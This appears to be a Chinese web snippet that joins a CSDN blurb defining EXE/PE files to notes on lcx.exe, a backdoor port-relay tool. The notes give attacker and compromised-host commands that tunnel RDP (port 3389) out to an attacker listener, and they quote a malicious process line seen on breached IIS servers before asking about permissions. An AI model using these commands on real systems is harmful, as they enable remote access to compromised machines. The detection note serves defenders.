EXE文件结构及读取方法
- - CSDN博客推荐文章 EXE File英文全名executable file ,译作可执行文件,可移植可执行 (PE) 文件格式的文件,它可以加载到内存中,并由操作系统加载程序执行,是可在操作系统存储空间中浮动定位的可执行程序. 如记事本程序notepad.exe ,可以用来编辑文档,如:测试.txt双击打开notepad.exe记事本程序来进行编辑处理.
用 virustotal 掃,說它是後門、遠端控制工具,google 上搜尋也把它跟 nc 同比,所以是類似的工具
怎麼用
攻擊端 (10.2.2.63)
lcx.exe -listen 33333 55555
肉雞端 (10.10.10.138)
lcx.exe -slave 10.2.2.63 33333 10.10.10.138 3389
可以用 mstsc 連 10.2.2.63:55555 成功遠端連線到 10.10.10.138,而不需用 10.10.10.138:3389 (前提是肉雞有開啟遠端連線功能),可以連但也要帳密才能登入
如果網站被丟到且執行了,或許在程序上會看到
"X:\RECYCLER\cmd.exe" /c X:\RECYCLER\lcx.exe -slave xx.xx.xx.xx 520 127.0.0.1 3389
是要把 IIS 應用程式的執行權限設成"僅指令碼" 嗎 ?